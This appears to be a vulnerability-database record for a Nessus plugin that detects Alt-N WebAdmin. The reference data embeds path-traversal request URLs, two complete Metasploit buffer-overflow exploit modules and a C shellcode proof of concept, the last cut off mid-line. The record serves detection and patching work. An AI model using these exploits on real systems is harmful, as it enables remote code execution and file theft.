ID WEBADMIN.NASL Type nessus Reporter This script is Copyright (C) 2003-2018 Tenable Network Security, Inc. Modified 2021-01-02T00:00:00
Description
webadmin.dll was found on the web server. Old versions of this CGI
suffered from numerous problems:
- installation path disclosure;
- directory traversal, allowing anybody with administrative permission
on WebAdmin to read any file;
- a buffer overflow, allowing anybody to run arbitrary code on the
server with SYSTEM privileges.
Note that no attack was performed and the version number was not
checked, so this might be a false positive.
#
# (C) Tenable Network Security, Inc.
#
# References:
# http://www.kamborio.com/?Section=Articles&Mode=select&ID=55
#
# From: "Mark Litchfield" <mark@ngssoftware.com>
# To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
# vulndb@securityfocus.com
# Date: Tue, 24 Jun 2003 15:22:21 -0700
# Subject: Remote Buffer Overrun WebAdmin.exe
#
include("compat.inc");
# Plugin registration. When the scanner loads the plugin with `description`
# set, only this block runs: it declares the plugin's identity, the issues it
# reports on, its scoring and its run-time requirements, then exits. The
# detection logic lives after the closing brace.
if (description)
{
script_id(11771);
script_version("1.28");
script_cvs_date("Date: 2018/11/15 20:50:19");
# The two issues this plugin covers: CVE-2003-0471 (the USER-parameter buffer
# overflow, see the metasploit_name below) and CVE-2003-1463 (path
# disclosure / absolute path traversal), plus the matching BugTraq ids.
script_cve_id("CVE-2003-0471", "CVE-2003-1463");
script_bugtraq_id(7438, 7439, 8024);
script_name(english:"Alt-N WebAdmin Multiple Vulnerabilities");
script_summary(english:"Checks for the presence of webadmin.dll");
script_set_attribute(attribute:'synopsis', value:"The remote CGI is vulnerable to multiple flaws.");
# The description makes the limitation explicit: this is a presence-only
# check, no version is read, so the finding may be a false positive.
script_set_attribute(attribute:'description', value:
"webadmin.dll was found on the web server. Old versions of this CGI
suffered from numerous problems: - installation path disclosure -
directory traversal, allowing anybody with administrative permission
on WebAdmin to read any file - buffer overflow, allowing anybody to
run arbitrary code on the server with SYSTEM privileges.
Note that no attack was performed, and the version number was not
checked, so this might be a false alert");
script_set_attribute(attribute:'see_also', value:"https://marc.info/?l=bugtraq&m=105647081418155&w=2");
script_set_attribute(attribute:'see_also', value:'https://www.securityfocus.com/archive/1/319735');
script_set_attribute(attribute:'solution', value:"Upgrade to Alt-N WebAdmin 2.0.5 or later.");
# Scoring reflects the more severe of the two CVEs (unauthenticated,
# network-reachable, partial C/I/A).
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
# NOTE(review): exploit_available is "false" while a Metasploit module is
# declared on the next two lines and exploitability_ease says no exploit is
# required; these three attributes look inconsistent and should be
# reconciled, since they feed risk prioritisation downstream.
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"metasploit_name", value:'Alt-N WebAdmin USER Buffer Overflow');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_cwe_id(20);
script_set_attribute(attribute:"vuln_publication_date", value:"2003/06/24");
script_set_attribute(attribute:"plugin_publication_date", value:"2003/06/24");
# Marks the result as unconfirmed, consistent with the presence-only check
# and the paranoid-report gate below.
script_set_attribute(attribute:"potential_vulnerability", value:"true");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.");
script_family(english:"CGI abuses");
# Run after HTTP service discovery; no404.nasl presumably records how the
# server answers for missing files so that the CGI probe is not fooled by
# catch-all 200 responses -- confirm against the include.
script_dependencie("http_version.nasl", "find_service1.nasl", "no404.nasl");
# Only scheduled when paranoid reporting is enabled; the detection code
# re-checks report_paranoia before doing anything.
script_require_keys("Settings/ParanoidReport");
# Needs an HTTP service; port 80 is the default when none was discovered.
script_require_ports("Services/www", 80);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
# Presence-only check (no version is read), so it runs only when the scan
# is configured for paranoid reporting; otherwise record the audit reason.
if (report_paranoia < 2) audit(AUDIT_PARANOID);

port = get_http_port(default:80);

# Ask the HTTP service whether webadmin.dll is reachable; nothing is sent
# beyond that probe. Stop quietly when it is not found.
found = is_cgi_installed3(port:port, item:"webadmin.dll");
if (!found) exit(0);

# The file is present: report the (potential) hole against this port.
security_hole(port);
{"id": "WEBADMIN.NASL", "bulletinFamily": "scanner", "title": "Alt-N WebAdmin Multiple Vulnerabilities", "description": "webadmin.dll was found on the web server. Old versions of this CGI\nsuffered from numerous problems: - installation path disclosure -\ndirectory traversal, allowing anybody with administrative permission\non WebAdmin to read any file - buffer overflow, allowing anybody to\nrun arbitrary code on the server with SYSTEM privileges.\n\nNote that no attack was performed, and the version number was not\nchecked, so this might be a false alert", "published": "2003-06-24T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/11771", "reporter": "This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.", "references": ["https://www.securityfocus.com/archive/1/319735", "https://marc.info/?l=bugtraq&m=105647081418155&w=2"], "cvelist": ["CVE-2003-1463", "CVE-2003-0471"], "type": "nessus", "lastseen": "2021-01-01T07:00:28", "edition": 23, "viewCount": 30, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-1463", "CVE-2003-0471"]}, {"type": "exploitdb", "idList": ["EDB-ID:22833", "EDB-ID:1210", "EDB-ID:16776", "EDB-ID:22541", "EDB-ID:22834", "EDB-ID:22542"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83099"]}, {"type": "osvdb", "idList": ["OSVDB:2653", "OSVDB:2207"]}, {"type": "openvas", "idList": ["OPENVAS:11771", "OPENVAS:136141256231011771"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/ALTN_WEBADMIN"]}], "modified": "2021-01-01T07:00:28", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2021-01-01T07:00:28", "rev": 2}, "vulnersScore": 6.6}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# References:\n# http://www.kamborio.com/?Section=Articles&Mode=select&ID=55\n#\n# From: \"Mark Litchfield\" <mark@ngssoftware.com>\n# To: bugtraq@securityfocus.com, 
vulnwatch@vulnwatch.org,\n# vulndb@securityfocus.com\n# Date: Tue, 24 Jun 2003 15:22:21 -0700\n# Subject: Remote Buffer Overrun WebAdmin.exe\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11771);\n script_version(\"1.28\");\n script_cvs_date(\"Date: 2018/11/15 20:50:19\");\n\n script_cve_id(\"CVE-2003-0471\", \"CVE-2003-1463\");\n script_bugtraq_id(7438, 7439, 8024);\n\n script_name(english:\"Alt-N WebAdmin Multiple Vulnerabilities\");\n script_summary(english:\"Checks for the presence of webadmin.dll\");\n\n script_set_attribute(attribute:'synopsis', value:\"The remote CGI is vulnerable to multiple flaws.\");\n\n script_set_attribute(attribute:'description', value:\n\"webadmin.dll was found on the web server. Old versions of this CGI\nsuffered from numerous problems: - installation path disclosure -\ndirectory traversal, allowing anybody with administrative permission\non WebAdmin to read any file - buffer overflow, allowing anybody to\nrun arbitrary code on the server with SYSTEM privileges.\n\nNote that no attack was performed, and the version number was not\nchecked, so this might be a false alert\");\n script_set_attribute(attribute:'see_also', value:\"https://marc.info/?l=bugtraq&m=105647081418155&w=2\");\n script_set_attribute(attribute:'see_also', value:'https://www.securityfocus.com/archive/1/319735');\n script_set_attribute(attribute:'solution', value:\"Upgrade to Alt-N WebAdmin 2.0.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Alt-N WebAdmin USER Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20);\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/06/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/06/24\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CGI abuses\");\n\n script_dependencie(\"http_version.nasl\", \"find_service1.nasl\", \"no404.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:80);\nres = is_cgi_installed3(port:port, item:\"webadmin.dll\");\nif (res) security_hole(port);\n", "naslFamily": "CGI abuses", "pluginID": "11771", "cpe": [], "scheme": null}
{"cve": [{"lastseen": "2020-10-03T11:33:03", "description": "Absolute path traversal vulnerability in Alt-N Technologies WebAdmin 2.0.0 through 2.0.2 allows remote attackers with administrator privileges to (1) determine the installation path by reading the contents of the Name parameter in a link, and (2) read arbitrary files via an absolute path in the Name parameter.", "edition": 3, "cvss3": {}, "published": "2003-12-31T05:00:00", "title": "CVE-2003-1463", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-1463"], "modified": "2017-07-29T01:29:00", "cpe": ["cpe:/a:alt-n:webadmin:2.0.2", "cpe:/a:alt-n:webadmin:2.0.0", "cpe:/a:alt-n:webadmin:2.0.1"], "id": "CVE-2003-1463", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1463", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:alt-n:webadmin:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:alt-n:webadmin:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:alt-n:webadmin:2.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:33:02", "description": "Buffer overflow in WebAdmin.exe for WebAdmin allows remote attackers to execute arbitrary code via an HTTP request to WebAdmin.dll with a long USER argument.", "edition": 3, "cvss3": {}, "published": "2003-08-07T04:00:00", "title": "CVE-2003-0471", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, 
"cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0471"], "modified": "2016-10-18T02:34:00", "cpe": ["cpe:/a:alt-n:webadmin:*"], "id": "CVE-2003-0471", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0471", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:alt-n:webadmin:*:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-02T18:58:36", "description": "Alt-N WebAdmin 2.0.x Remote File Viewing Vulnerability. CVE-2003-1463. Remote exploit for cgi platform", "published": "2003-04-25T00:00:00", "type": "exploitdb", "title": "Alt-N WebAdmin 2.0.x - Remote File Viewing Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-1463"], "modified": "2003-04-25T00:00:00", "id": "EDB-ID:22541", "href": "https://www.exploit-db.com/exploits/22541/", "sourceData": "source: http://www.securityfocus.com/bid/7438/info\r\n\r\nAlt-N WebAdmin allows a remote user to access files that they should not be able to access. The remote user can submit an HTTP request that will return the contents of any webserver-readable file on the system.\r\n\r\nNOTE: The user must have administrative privileges in WebAdmin to access these files.\r\n\r\nhttp://server/WebAdmin.dll?Session=X&Program=MDaemon&Directory:Name=C:\\WINNT&File:Name=WIN.INI&View=ViewFile\r\n\r\n", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/22541/"}, {"lastseen": "2016-02-02T18:58:44", "description": "Alt-N WebAdmin 2.0.x Remote File Disclosure Vulnerability. CVE-2003-1463. 
Remote exploit for cgi platform", "published": "2003-04-25T00:00:00", "type": "exploitdb", "title": "Alt-N WebAdmin 2.0.x - Remote File Disclosure Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-1463"], "modified": "2003-04-25T00:00:00", "id": "EDB-ID:22542", "href": "https://www.exploit-db.com/exploits/22542/", "sourceData": "source: http://www.securityfocus.com/bid/7439/info\r\n\r\nReportedly, remote users can discover the installation directory of certain software on the underlying system by submitting an HTTP request to the WebAdmin server. This could allow an attacker to obtain sensitive information.\r\n\r\nhttp://www.example.com/WebAdmin.dll?session=X&Program=MDaemon&Directory:Name=C:\\MDaemon\\App&File:Name=MDAEMON.INI&View=EditFile ", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/22542/"}, {"lastseen": "2016-01-31T13:46:25", "description": "WebAdmin <= 2.0.4 USER Buffer Overflow Exploit. CVE-2003-0471. Remote exploit for windows platform", "published": "2005-09-11T00:00:00", "type": "exploitdb", "title": "WebAdmin <= 2.0.4 USER Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0471"], "modified": "2005-09-11T00:00:00", "id": "EDB-ID:1210", "href": "https://www.exploit-db.com/exploits/1210/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be redistributed\r\n# according to the licenses defined in the Authors field below. In the\r\n# case of an unknown or missing license, this file defaults to the same\r\n# license as the core Framework (dual GPLv2 and Artistic). 
The latest\r\n# version of the Framework can always be obtained from metasploit.com.\r\n##\r\n\r\npackage Msf::Exploit::altn_webadmin;\r\nuse base \"Msf::Exploit\";\r\nuse strict;\r\nuse Pex::Text;\r\n\r\nmy $advanced = { };\r\n\r\nmy $info =\r\n {\r\n\r\n\t'Name' => 'Alt-N WebAdmin USER Buffer Overflow',\r\n\t'Version' => '$Revision: 1.1 $',\r\n\t'Authors' => [ 'y0 [at] w00t-shell.net', ],\r\n\t'Arch' => [ 'x86' ],\r\n\t'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003' ],\r\n\t'Priv' => 0,\r\n\t\r\n\t'AutoOpts' => { 'EXITFUNC' => 'thread' },\r\n\t'UserOpts' => {\r\n\t\t'RHOST' => [1, 'ADDR', 'The target address'],\r\n\t\t'RPORT' => [1, 'PORT', 'The target port', 1000],\r\n\t\t'SSL' => [0, 'BOOL', 'Use SSL'],\r\n\t },\r\n\t \r\n\t\r\n\r\n\t'Payload' =>\r\n\t {\r\n\t\t'Space' => 830,\r\n\t\t'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",\r\n\t\t'Prepend' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",\r\n\t\t'Keys' => ['+ws2ord'],\r\n\t },\r\n\r\n\t'Description' => Pex::Text::Freeform(qq{\r\nAlt-N WebAdmin is prone to a buffer overflow condition. \r\nThis is due to insufficient bounds checking on the USER \r\nparameter. 
Successful exploitation could result in code \r\nexecution with SYSTEM level privileges.\r\n}),\r\n\r\n\t'Refs' =>\r\n\t [\r\n\t\t['BID', '8024'],\r\n\t\t['NSS', '11771'],\r\n\t ],\r\n\t \r\n\t'Targets' =>\r\n\t [\r\n\t\t['WebAdmin 2.0.4 Universal', 0x10074d9b], # 2.0.4 webAdmin.dll\r\n\t\t['WebAdmin 2.0.3 Universal', 0x10074b13], # 2.0.3 webAdmin.dll\r\n\t\t['WebAdmin 2.0.2 Universal', 0x10071e3b], # 2.0.2 webAdmin.dll\r\n\t\t['WebAdmin 2.0.1 Universal', 0x100543c2], # 2.0.1 webAdmin.dll\r\n\r\n\t ],\r\n\t'Keys' => ['webadmin'],\r\n };\r\n\r\nsub new {\r\n\tmy $class = shift;\r\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\r\n\treturn($self);\r\n}\r\n\r\nsub Check {\r\n\tmy ($self) = @_;\r\n\tmy $target_host = $self->GetVar('RHOST');\r\n\tmy $target_port = $self->GetVar('RPORT');\r\n\r\n\tmy $s = Msf::Socket::Tcp->new\r\n\t (\r\n\t\t'PeerAddr' => $target_host,\r\n\t\t'PeerPort' => $target_port,\r\n\t\t'LocalPort' => $self->GetVar('CPORT'),\r\n\t\t'SSL' => $self->GetVar('SSL'),\r\n\t );\r\n\tif ($s->IsError) {\r\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\r\n\t\treturn $self->CheckCode('Connect');\r\n\t}\r\n\r\n\t$s->Send(\"GET / HTTP/1.0\\r\\n\\r\\n\");\r\n\tmy $res = $s->Recv(-1, 20);\r\n\t$s->Close();\r\n\r\n\tif ($res !~ /v2\\.0\\.4|v2\\.0\\.3|v2\\.0\\.2|v2\\.0\\.1/) {\r\n\t\t$self->PrintLine(\"[*] This server does not appear to be vulnerable.\");\r\n\t\treturn $self->CheckCode('Safe');\r\n\t}\r\n\r\n\t$self->PrintLine(\"[*] Vulnerable installation detected :-)\");\r\n\treturn $self->CheckCode('Detected');\r\n}\r\n\r\nsub Exploit\r\n{\r\n\tmy $self = shift;\r\n\tmy $target_host = $self->GetVar('RHOST');\r\n\tmy $target_port = $self->GetVar('RPORT');\r\n\tmy $target_idx = $self->GetVar('TARGET');\r\n\tmy $shellcode = $self->GetVar('EncodedPayload')->Payload;\r\n\tmy $target = $self->Targets->[$target_idx];\r\n\r\n\tif (! 
$self->InitNops(128)) {\r\n\t\t$self->PrintLine(\"[*] Failed to initialize the nop module.\");\r\n\t\treturn;\r\n\t}\r\n\r\n\tmy $splat = Pex::Text::AlphaNumText(168);\r\n\r\n\tmy $credz =\r\n\t \"User=\". $splat. pack('V', $target->[1]). $shellcode.\r\n\t \"&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In\\r\\n\";\r\n\r\n\tmy $sploit =\r\n\t \"POST /WebAdmin.DLL?View=Logon HTTP/1.1\\r\\n\".\r\n\t \"Content-Type: application/x-www-form-urlencoded\\r\\n\".\r\n\t \"Connection: close\\r\\n\".\r\n\t \"Cookie: User=y0; Lang=en; Theme=standard\\r\\n\".\r\n\t \"User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.31-grsec i686)\\r\\n\".\r\n\t \"Host: $target_host\\r\\n\".\r\n\t \"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png\\r\\n\".\r\n\t \"Accept-Language: en\\r\\n\".\r\n\t \"Accept-Charset: iso-8859-1,*,utf-8\\r\\n\".\r\n\t \"Content-Length: \". length($credz). \"\\r\\n\\r\\n\".\r\n\t $credz;\r\n\r\n\t$self->PrintLine(sprintf(\"[*] Trying to exploit target %s 0x%.8x\", $target->[0], $target->[1]));\r\n\r\n\tmy $s = Msf::Socket::Tcp->new\r\n\t (\r\n\t\t'PeerAddr' => $target_host,\r\n\t\t'PeerPort' => $target_port,\r\n\t\t'LocalPort' => $self->GetVar('CPORT'),\r\n\t\t'SSL' => $self->GetVar('SSL'),\r\n\t );\r\n\tif ($s->IsError) {\r\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\r\n\t\treturn;\r\n\t}\r\n\r\n\t$s->Send($sploit);\r\n\t$self->Handler($s);\r\n\t$s->Close();\r\n\treturn;\r\n}\n\n# milw0rm.com [2005-09-11]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1210/"}, {"lastseen": "2016-02-02T06:28:58", "description": "Alt-N WebAdmin USER Buffer Overflow. CVE-2003-0471. 
Remote exploit for windows platform", "published": "2010-02-15T00:00:00", "type": "exploitdb", "title": "Alt-N WebAdmin USER Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0471"], "modified": "2010-02-15T00:00:00", "id": "EDB-ID:16776", "href": "https://www.exploit-db.com/exploits/16776/", "sourceData": "##\r\n# $Id: altn_webadmin.rb 8498 2010-02-15 00:48:03Z hdm $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Alt-N WebAdmin USER Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tAlt-N WebAdmin is prone to a buffer overflow condition. This\r\n\t\t\t\tis due to insufficient bounds checking on the USER\r\n\t\t\t\tparameter. 
Successful exploitation could result in code\r\n\t\t\t\texecution with SYSTEM level privileges.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 8498 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2003-0471' ],\r\n\t\t\t\t\t[ 'OSVDB', '2207' ],\r\n\t\t\t\t\t[ 'BID', '8024'],\r\n\t\t\t\t\t[ 'NSS', '11771'],\r\n\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 830,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['Automatic', {}],\r\n\t\t\t\t\t['WebAdmin 2.0.4 Universal', { 'Ret' => 0x10074d9b }], # 2.0.4 webAdmin.dll\r\n\t\t\t\t\t['WebAdmin 2.0.3 Universal', { 'Ret' => 0x10074b13 }], # 2.0.3 webAdmin.dll\r\n\t\t\t\t\t['WebAdmin 2.0.2 Universal', { 'Ret' => 0x10071e3b }], # 2.0.2 webAdmin.dll\r\n\t\t\t\t\t['WebAdmin 2.0.1 Universal', { 'Ret' => 0x100543c2 }], # 2.0.1 webAdmin.dll\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jun 24 2003'))\r\n\r\n\t\t\tregister_options([Opt::RPORT(1000)], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tmytarget = target\r\n\r\n\t\tif (target.name =~ /Automatic/)\r\n\t\t\tres = send_request_raw({\r\n\t\t\t\t'uri' => '/WebAdmin.DLL'\r\n\t\t\t}, -1)\r\n\r\n\t\t\tif (res and res.body =~ /WebAdmin.*v(2\\..*)$/)\r\n\t\t\t\tcase $1\r\n\t\t\t\twhen /2\\.0\\.4/\r\n\t\t\t\t\tmytarget = targets[1]\r\n\t\t\t\twhen /2\\.0\\.3/\r\n\t\t\t\t\tmytarget = targets[2]\r\n\t\t\t\twhen /2\\.0\\.2/\r\n\t\t\t\t\tmytarget = targets[3]\r\n\t\t\t\twhen /2\\.0\\.1/\r\n\t\t\t\t\tmytarget = targets[4]\r\n\t\t\t\telse\r\n\t\t\t\t\tprint_error(\"No target found for 
v#{$1}\")\r\n\t\t\t\t\treturn\r\n\t\t\t\tend\r\n\t\t\telse\r\n\t\t\t\tprint_error(\"No target found\")\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\tuser_cook = rand_text_alphanumeric(2)\r\n\t\tpost_data = 'User=' + make_nops(168) + [mytarget.ret].pack('V') + payload.encoded\r\n\t\tpost_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'\r\n\r\n\t\tprint_status(\"Sending request...\")\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => '/WebAdmin.DLL',\r\n\t\t\t'query' => 'View=Logon',\r\n\t\t\t'method' => 'POST',\r\n\t\t\t'content-type' => 'application/x-www-form-urlencoded',\r\n\t\t\t'cookie' => \"User=#{user_cook}; Lang=en; Theme=standard\",\r\n\t\t\t'data' => post_data,\r\n\t\t\t'headers' =>\r\n\t\t\t{\r\n\t\t\t\t'Accept' => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png',\r\n\t\t\t\t'Accept-Language' => 'en',\r\n\t\t\t\t'Accept-Charset' => 'iso-8859-1,*,utf-8'\r\n\t\t\t}\r\n\t\t}, 5)\r\n\r\n\t\thandler\r\n\tend\r\n\r\nend\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16776/"}, {"lastseen": "2016-02-02T19:38:53", "description": "Alt-N WebAdmin 2.0.x USER Parameter Buffer Overflow Vulnerability (1). CVE-2003-0471. Remote exploit for windows platform", "published": "2003-06-24T00:00:00", "type": "exploitdb", "title": "Alt-N WebAdmin 2.0.x USER Parameter Buffer Overflow Vulnerability 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0471"], "modified": "2003-06-24T00:00:00", "id": "EDB-ID:22833", "href": "https://www.exploit-db.com/exploits/22833/", "sourceData": "source: http://www.securityfocus.com/bid/8024/info\r\n\r\nAlt-N WebAdmin is prone to a buffer overflow condition. This is due to insufficient bounds checking on the USER parameter. Successful exploitation could result in code execution with SYSTEM level privileges.\r\n\r\n/* WebAdmin.dll remote proof of concept 2.0.4 version.. 
tried finding 2.0.5 but all versions\r\nwere already patched from the dl sites... this was tested on a win2ksp2 server, i suggest\r\nusing better shellcode this is just something i know works, just opens a cmd.exe prompt\r\non the victim box. I imagine this won't be too much harder to exploit with 2.0.5 unpatched\r\nthis took me about 1 hour to write and it was my first remote win32 exploit, thank you alt-n :D.\r\nword to Mark Litchfield for finding this, i suggest anyone who is interested in learning win32\r\nexploitation download this and attempt to exploit it, it's easier than you think.\r\nshouts to innercircle you little kittens you....\r\n-wire */\r\n#include <winsock2.h>\r\n#include <stdio.h>\r\n\r\n#pragma comment(lib \"ws2_32\");\r\nchar sc[] = \r\n\t\t\t\t\t \"\\x55\"\t\t\t\t\t// push ebp\r\n\t\t\t\t\t \"\\x8b\\xec\"\t\t\t\t// mov ebp, esp\r\n\t\t\t\t\t \"\\x53\"\t\t\t\t\t// push ebx\r\n\t\t\t\t\t \"\\x56\"\t\t\t\t\t// push esi\r\n\t\t\t\t\t \"\\x57\"\t\t\t\t\t// push edi\r\n\t\t\t\t\t \"\\x8b\\xe5\"\t\t\t\t// mov esp, ebp\t\t\t\t\r\n\t\t\t\t\t \"\\x55\"\t\t\t\t\t// push ebp\r\n\t\t\t\t\t \"\\x8b\\xec\"\t\t\t\t// mov ebp, esp\r\n\t\t\t\t\t \"\\x33\\xff\"\t\t\t\t// xor edi,edi\r\n\t\t\t\t\t \"\\x57\"\t\t\t\t\t// push edi\r\n\t\t\t\t\t \"\\x57\"\t\t\t\t\t// push edi\r\n\t\t\t\t\t \"\\xc6\\x45\\xf8\\x6d\"\t\t\t// mov byte ptr ss:[ebp-8],6d\r\n\t\t\t\t\t \"\\xc6\\x45\\xf9\\x73\"\t\t\t// mov byte ptr ss:[ebp-7],73\r\n\t\t\t\t\t \"\\xc6\\x45\\xfa\\x76\"\t\t\t// mov byte ptr ss:[ebp-6],76\r\n\t\t\t\t\t \"\\xc6\\x45\\xfb\\x63\"\t\t\t// mov byte ptr ss:[ebp-5],63\r\n\t\t\t\t\t \"\\xc6\\x45\\xfc\\x72\"\t\t\t// mov byte ptr ss:[ebp-4],72\r\n\t\t\t\t\t \"\\xc6\\x45\\xfd\\x74\"\t\t\t// mov byte ptr ss:[ebp-3],74\r\n\t\t\t\t\t \"\\xb8\\x54\\xa2\\xe8\\x77\" \t\t// mov 